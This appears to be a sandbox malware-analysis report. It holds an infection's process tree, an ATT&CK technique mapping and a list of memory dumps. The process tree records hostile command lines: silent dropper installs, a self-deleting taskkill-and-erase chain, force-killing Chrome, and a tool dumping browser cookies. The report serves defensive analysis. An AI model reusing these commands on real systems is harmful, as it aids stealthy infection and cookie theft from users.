        PID:5400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse69D8.tmp\tempfile.ps1"
        12⤵
        
        PID:696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse69D8.tmp\tempfile.ps1"
        12⤵
        
        PID:9672
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "1_4924807894722937236.exe" /f & erase "C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe" & exit
        10⤵
        
        PID:5840
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im "1_4924807894722937236.exe" /f
        11⤵
        Kills process with taskkill
        
        PID:5432
        
        C:\Program Files (x86)\Microsoft Data\Versium Research\askinstall38.exe
        
        "C:\Program Files (x86)\Microsoft Data\Versium Research\askinstall38.exe"
        9⤵
        
        PID:6816
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        10⤵
        
        PID:4600
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        11⤵
        Kills process with taskkill
        
        PID:2224
        
        C:\Program Files (x86)\Microsoft Data\Versium Research\dp81GdX0OrCQ.exe
        
        "C:\Program Files (x86)\Microsoft Data\Versium Research\dp81GdX0OrCQ.exe"
        9⤵
        
        PID:6612
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        10⤵
        
        PID:6880
        
        C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe
        
        "C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe"
        9⤵
        
        PID:6764
        
        C:\Users\Admin\AppData\Local\Temp\is-P8SAA.tmp\LabPicV3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-P8SAA.tmp\LabPicV3.tmp" /SL5="$703FC,506127,422400,C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe"
        10⤵
        
        PID:7076
        
        C:\Users\Admin\AppData\Local\Temp\is-C5UNA.tmp\3316505.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-C5UNA.tmp\3316505.exe" /S /UID=lab214
        11⤵
        
        PID:6540
        
        C:\Program Files\Windows Defender Advanced Threat Protection\OPYBQIBWXL\prolab.exe
        
        "C:\Program Files\Windows Defender Advanced Threat Protection\OPYBQIBWXL\prolab.exe" /VERYSILENT
        12⤵
        
        PID:7552
        
        C:\Users\Admin\AppData\Local\Temp\is-PAMU4.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PAMU4.tmp\prolab.tmp" /SL5="$4056C,575243,216576,C:\Program Files\Windows Defender Advanced Threat Protection\OPYBQIBWXL\prolab.exe" /VERYSILENT
        13⤵
        
        PID:7612
        
        C:\Users\Admin\AppData\Local\Temp\f3-67320-396-88baa-5e8a4bdc54781\Lajolaesiva.exe
        
        "C:\Users\Admin\AppData\Local\Temp\f3-67320-396-88baa-5e8a4bdc54781\Lajolaesiva.exe"
        12⤵
        
        PID:7812
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 2152
        13⤵
        
        PID:10024
        
        C:\Users\Admin\AppData\Local\Temp\7b-0af32-85e-e73b0-a62d19fc32ab7\SHumucusabi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7b-0af32-85e-e73b0-a62d19fc32ab7\SHumucusabi.exe"
        12⤵
        
        PID:7852
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jl1pocuo.dl5\sskiper.exe /s & exit
        13⤵
        
        PID:3092
        
        C:\Users\Admin\AppData\Local\Temp\jl1pocuo.dl5\sskiper.exe
        
        C:\Users\Admin\AppData\Local\Temp\jl1pocuo.dl5\sskiper.exe /s
        14⤵
        
        PID:7128
        
        C:\Users\Admin\AppData\Local\Temp\37931297.exe
        
        C:\Users\Admin\AppData\Local\Temp\37931297.exe
        15⤵
        
        PID:8780
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        16⤵
        
        PID:9552
        
        C:\Users\Admin\AppData\Local\Temp\1655273480.exe
        
        C:\Users\Admin\AppData\Local\Temp\1655273480.exe
        15⤵
        
        PID:9752
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1rnbe3yk.wf0\KiffMainE1.exe & exit
        13⤵
        
        PID:7628
        
        C:\Users\Admin\AppData\Local\Temp\1rnbe3yk.wf0\KiffMainE1.exe
        
        C:\Users\Admin\AppData\Local\Temp\1rnbe3yk.wf0\KiffMainE1.exe
        14⤵
        
        PID:5020
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wt4ppsgf.ybq\001.exe & exit
        13⤵
        
        PID:7612
        
        C:\Users\Admin\AppData\Local\Temp\wt4ppsgf.ybq\001.exe
        
        C:\Users\Admin\AppData\Local\Temp\wt4ppsgf.ybq\001.exe
        14⤵
        
        PID:5028
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\miqaaaxa.rez\installer.exe /qn CAMPAIGN="654" & exit
        13⤵
        
        PID:6088
        
        C:\Users\Admin\AppData\Local\Temp\miqaaaxa.rez\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\miqaaaxa.rez\installer.exe /qn CAMPAIGN="654"
        14⤵
        
        PID:8052
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\miqaaaxa.rez\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\miqaaaxa.rez\ EXE_CMD_LINE="/forcecleanup /wintime 1619883647 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        15⤵
        
        PID:9920
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4tenxjro.pd4\gpooe.exe & exit
        13⤵
        
        PID:6604
        
        C:\Users\Admin\AppData\Local\Temp\4tenxjro.pd4\gpooe.exe
        
        C:\Users\Admin\AppData\Local\Temp\4tenxjro.pd4\gpooe.exe
        14⤵
        
        PID:2956
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        15⤵
        
        PID:9372
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        15⤵
        
        PID:7944
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        15⤵
        
        PID:5032
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        15⤵
        
        PID:9100
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c0ob4emr.ee3\sskiper.exe /s & exit
        13⤵
        
        PID:5764
        
        C:\Users\Admin\AppData\Local\Temp\c0ob4emr.ee3\sskiper.exe
        
        C:\Users\Admin\AppData\Local\Temp\c0ob4emr.ee3\sskiper.exe /s
        14⤵
        
        PID:8528
        
        C:\Users\Admin\AppData\Local\Temp\1139836490.exe
        
        C:\Users\Admin\AppData\Local\Temp\1139836490.exe
        15⤵
        
        PID:6288
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        16⤵
        
        PID:7612
        
        C:\Users\Admin\AppData\Local\Temp\2045300393.exe
        
        C:\Users\Admin\AppData\Local\Temp\2045300393.exe
        15⤵
        
        PID:8068
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rfnqkebv.fit\google-game.exe & exit
        13⤵
        
        PID:8032
        
        C:\Users\Admin\AppData\Local\Temp\rfnqkebv.fit\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\rfnqkebv.fit\google-game.exe
        14⤵
        
        PID:8408
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
        15⤵
        
        PID:8848
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\es4hahqi.v4m\askinstall39.exe & exit
        13⤵
        
        PID:8496
        
        C:\Users\Admin\AppData\Local\Temp\es4hahqi.v4m\askinstall39.exe
        
        C:\Users\Admin\AppData\Local\Temp\es4hahqi.v4m\askinstall39.exe
        14⤵
        
        PID:8996
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f2pcy2tf.rrt\y1.exe & exit
        13⤵
        
        PID:8252
        
        C:\Users\Admin\AppData\Local\Temp\f2pcy2tf.rrt\y1.exe
        
        C:\Users\Admin\AppData\Local\Temp\f2pcy2tf.rrt\y1.exe
        14⤵
        
        PID:9332
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cnw4z43m.2oa\setup.exe & exit
        13⤵
        
        PID:6648
        
        C:\Users\Admin\AppData\Local\Temp\cnw4z43m.2oa\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\cnw4z43m.2oa\setup.exe
        14⤵
        
        PID:9456
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1m0io5cb.fsi\toolspab1.exe & exit
        13⤵
        
        PID:9944
        
        C:\Users\Admin\AppData\Local\Temp\1m0io5cb.fsi\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\1m0io5cb.fsi\toolspab1.exe
        14⤵
        
        PID:7776
        
        C:\Users\Admin\AppData\Local\Temp\1m0io5cb.fsi\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\1m0io5cb.fsi\toolspab1.exe
        15⤵
        
        PID:780
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a34ejloq.afq\GcleanerWW.exe /mixone & exit
        13⤵
        
        PID:9256
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m5zqq4xt.yjt\SunLabsPlayer.exe /S & exit
        13⤵
        
        PID:9036
        
        C:\Users\Admin\AppData\Local\Temp\m5zqq4xt.yjt\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\m5zqq4xt.yjt\SunLabsPlayer.exe /S
        14⤵
        
        PID:8088
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvAA57.tmp\tempfile.ps1"
        15⤵
        
        PID:9604
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zxjdndgu.vyz\005.exe & exit
        13⤵
        
        PID:2164
        
        C:\Users\Admin\AppData\Local\Temp\zxjdndgu.vyz\005.exe
        
        C:\Users\Admin\AppData\Local\Temp\zxjdndgu.vyz\005.exe
        14⤵
        
        PID:4992
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ae4yw0qu.lou\Setup3310.exe /Verysilent /subid=623 & exit
        13⤵
        
        PID:5520
        
        C:\Users\Admin\AppData\Local\Temp\ae4yw0qu.lou\Setup3310.exe
        
        C:\Users\Admin\AppData\Local\Temp\ae4yw0qu.lou\Setup3310.exe /Verysilent /subid=623
        14⤵
        
        PID:8368
        
        C:\Users\Admin\AppData\Local\Temp\is-6P78D.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-6P78D.tmp\Setup3310.tmp" /SL5="$30322,138429,56832,C:\Users\Admin\AppData\Local\Temp\ae4yw0qu.lou\Setup3310.exe" /Verysilent /subid=623
        15⤵
        
        PID:9784
        
        C:\Users\Admin\AppData\Local\Temp\is-6DTGT.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-6DTGT.tmp\Setup.exe" /Verysilent
        16⤵
        
        PID:2648

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4144

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4308

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3400

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4356

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4660

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5348
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding EB19472C8ABC271FC3A72124D31CAE9A C
  2⤵
  PID:5688
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 74EA7D03B8EB780F2F8CCD9BC21A0984
  2⤵
  PID:3132
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:5580
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 0B98408FFE55F77F7C9C02F3F000BECE E Global\MSI0000
  2⤵
  PID:5004
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 912376CE55EC15FE96F039306447B8F6 C
  2⤵
  PID:8636
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 41B76ECE2D5E668B88E7EAFEA15DBC3A
  2⤵
  PID:8992
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:2920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:4124

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5856

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2632

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5748

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8664

C:\Users\Admin\AppData\Local\Temp\3B0C.exe
C:\Users\Admin\AppData\Local\Temp\3B0C.exe
1⤵
PID:5200

C:\Users\Admin\AppData\Local\Temp\4C34.exe
C:\Users\Admin\AppData\Local\Temp\4C34.exe
1⤵
PID:4480
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  2⤵
  PID:4776

C:\Users\Admin\AppData\Local\Temp\6E92.exe
C:\Users\Admin\AppData\Local\Temp\6E92.exe
1⤵
PID:5692
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 736
  2⤵
  - Program crash
  PID:7752
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 748
  2⤵
  - Program crash
  PID:4032
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 716
  2⤵
  - Program crash
  PID:4868
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 896
  2⤵
  - Program crash
  PID:8688
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 900
  2⤵
  - Program crash
  PID:2356

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7504

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6916

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4696

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4544

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4988

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:9928

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:9540

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:9636

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8016

C:\Users\Admin\AppData\Roaming\iifvtea
C:\Users\Admin\AppData\Roaming\iifvtea
1⤵
PID:9468
- C:\Users\Admin\AppData\Roaming\iifvtea
  C:\Users\Admin\AppData\Roaming\iifvtea
  2⤵
  PID:9300

C:\Users\Admin\AppData\Roaming\iifvtea
C:\Users\Admin\AppData\Roaming\iifvtea
1⤵
PID:8292
- C:\Users\Admin\AppData\Roaming\iifvtea
  C:\Users\Admin\AppData\Roaming\iifvtea
  2⤵
  PID:824

C:\Users\Admin\AppData\Roaming\iifvtea
C:\Users\Admin\AppData\Roaming\iifvtea
1⤵
PID:704

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

BITS Jobs

T1197

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

Software Discovery

T1518

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/348-275-0x00000227A5F90000-0x00000227A6000000-memory.dmp

Filesize
448KB

Download
memory/1020-297-0x000002B851100000-0x000002B851170000-memory.dmp

Filesize
448KB

Download
memory/1040-119-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/1108-291-0x000001DAA5910000-0x000001DAA5980000-memory.dmp

Filesize
448KB

Download
memory/1228-318-0x00000201DA510000-0x00000201DA580000-memory.dmp

Filesize
448KB

Download
memory/1244-344-0x0000000004C50000-0x0000000005256000-memory.dmp

Filesize
6.0MB

Download
memory/1272-321-0x0000018A9E0C0000-0x0000018A9E130000-memory.dmp

Filesize
448KB

Download
memory/1388-302-0x000001F84EB20000-0x000001F84EB90000-memory.dmp

Filesize
448KB

Download
memory/1864-316-0x0000029DB56B0000-0x0000029DB5720000-memory.dmp

Filesize
448KB

Download
memory/2132-145-0x00000000009A0000-0x00000000009A2000-memory.dmp

Filesize
8KB

Download
memory/2132-148-0x00000000009A2000-0x00000000009A4000-memory.dmp

Filesize
8KB

Download
memory/2132-150-0x00000000009A5000-0x00000000009A7000-memory.dmp

Filesize
8KB

Download
memory/2132-149-0x00000000009A4000-0x00000000009A5000-memory.dmp

Filesize
4KB

Download
memory/2308-146-0x0000000002DB0000-0x0000000002DB2000-memory.dmp

Filesize
8KB

Download
memory/2308-147-0x0000000002DB2000-0x0000000002DB4000-memory.dmp

Filesize
8KB

Download
memory/2308-151-0x0000000002DB5000-0x0000000002DB6000-memory.dmp

Filesize
4KB

Download
memory/2380-286-0x0000018472F60000-0x0000018472FD0000-memory.dmp

Filesize
448KB

Download
memory/2408-281-0x0000017F63070000-0x0000017F630E0000-memory.dmp

Filesize
448KB

Download
memory/2408-278-0x0000017F628B0000-0x0000017F628FB000-memory.dmp

Filesize
300KB

Download
memory/2580-292-0x000001B713E00000-0x000001B713E70000-memory.dmp

Filesize
448KB

Download
memory/2668-347-0x00000000048D0000-0x0000000004ED6000-memory.dmp

Filesize
6.0MB

Download
memory/2688-326-0x0000018AA5A00000-0x0000018AA5A70000-memory.dmp

Filesize
448KB

Download
memory/2696-323-0x000001371A060000-0x000001371A0D0000-memory.dmp

Filesize
448KB

Download
memory/2832-349-0x0000000002CB0000-0x0000000002CC7000-memory.dmp

Filesize
92KB

Download
memory/2868-276-0x00000000034A0000-0x00000000034FC000-memory.dmp

Filesize
368KB

Download
memory/2868-274-0x0000000003393000-0x0000000003494000-memory.dmp

Filesize
1.0MB

Download
memory/2972-144-0x00000000021B0000-0x00000000021B2000-memory.dmp

Filesize
8KB

Download
memory/3356-282-0x000001E1463D0000-0x000001E146440000-memory.dmp

Filesize
448KB

Download
memory/3420-143-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/3736-126-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/3988-114-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/4052-123-0x0000000002770000-0x0000000002772000-memory.dmp

Filesize
8KB

Download
memory/4124-303-0x000002211B360000-0x000002211B3D0000-memory.dmp

Filesize
448KB

Download
memory/4124-343-0x000002211DB00000-0x000002211DC01000-memory.dmp

Filesize
1.0MB

Download
memory/4484-166-0x00000000001F0000-0x0000000000200000-memory.dmp

Filesize
64KB

Download
memory/4484-167-0x0000000000490000-0x00000000004A2000-memory.dmp

Filesize
72KB

Download
memory/4524-176-0x00000000030A0000-0x00000000030A1000-memory.dmp

Filesize
4KB

Download
memory/4524-175-0x00000000030B0000-0x00000000030B1000-memory.dmp

Filesize
4KB

Download
memory/4524-173-0x0000000000F30000-0x0000000000F31000-memory.dmp

Filesize
4KB

Download
memory/5076-172-0x00000000023B4000-0x00000000023B5000-memory.dmp

Filesize
4KB

Download
memory/5076-162-0x00000000023B0000-0x00000000023B2000-memory.dmp

Filesize
8KB

Download
memory/5096-234-0x0000000004D60000-0x0000000004D61000-memory.dmp

Filesize
4KB

Download
memory/5308-243-0x0000000000DE0000-0x0000000000DE1000-memory.dmp

Filesize
4KB

Download
memory/5308-255-0x0000000005550000-0x0000000005B56000-memory.dmp

Filesize
6.0MB

Download
memory/5580-338-0x00000000048D0000-0x0000000004961000-memory.dmp

Filesize
580KB

Download
memory/5580-339-0x0000000000400000-0x0000000002BF4000-memory.dmp

Filesize
40.0MB

Download
memory/5636-230-0x0000000005610000-0x0000000005611000-memory.dmp

Filesize
4KB

Download
memory/5636-251-0x0000000005000000-0x0000000005606000-memory.dmp

Filesize
6.0MB

Download
memory/5636-238-0x00000000050B0000-0x00000000050B1000-memory.dmp

Filesize
4KB

Download
memory/5636-331-0x00000000065C0000-0x00000000065C1000-memory.dmp

Filesize
4KB

Download
memory/5636-329-0x0000000006020000-0x0000000006021000-memory.dmp

Filesize
4KB

Download
memory/5636-245-0x00000000050F0000-0x00000000050F1000-memory.dmp

Filesize
4KB

Download
memory/5636-225-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/5636-256-0x00000000053B0000-0x00000000053B1000-memory.dmp

Filesize
4KB

Download
memory/5636-235-0x0000000005050000-0x0000000005051000-memory.dmp

Filesize
4KB

Download
memory/5788-341-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/6028-340-0x0000000000540000-0x000000000054C000-memory.dmp

Filesize
48KB

Download
memory/6276-367-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/6280-368-0x0000000004C10000-0x0000000004C11000-memory.dmp

Filesize
4KB

Download
memory/6280-369-0x0000000004C12000-0x0000000004C13000-memory.dmp

Filesize
4KB

Download
memory/7084-361-0x0000000000490000-0x00000000004A2000-memory.dmp

Filesize
72KB

Download
memory/7084-360-0x00000000001F0000-0x0000000000200000-memory.dmp

Filesize
64KB

Download